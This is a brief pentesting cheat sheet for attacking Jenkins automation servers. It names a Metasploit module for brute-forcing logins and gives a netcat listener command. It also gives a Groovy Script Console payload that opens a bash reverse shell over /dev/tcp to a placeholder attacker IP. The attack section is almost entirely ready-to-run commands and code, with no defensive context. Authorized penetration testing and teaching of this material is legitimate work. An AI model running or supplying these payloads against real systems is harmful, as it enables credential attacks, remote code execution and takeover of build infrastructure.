Jenkins Pentesting
Last modified: 2023-01-01
Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc.
Brute Force Credentials
msfconsole
msf > use auxiliary/scanner/http/jenkins_login
Reverse Shell on Dashboard
You need to have the credential.
-
Opening Listener on Your Local Machine
nc -lvnp 4444 -
Login to Jenkins
Access "http://localhost:8080" in browser and login.
-
Click "Manage Jenkins" -> "Script Console"
-
Add the Payload in the Console
r = Runtime.getRuntime() p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/<Attacker_IP>/4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() -
Click "Run"
Then you should get a shell.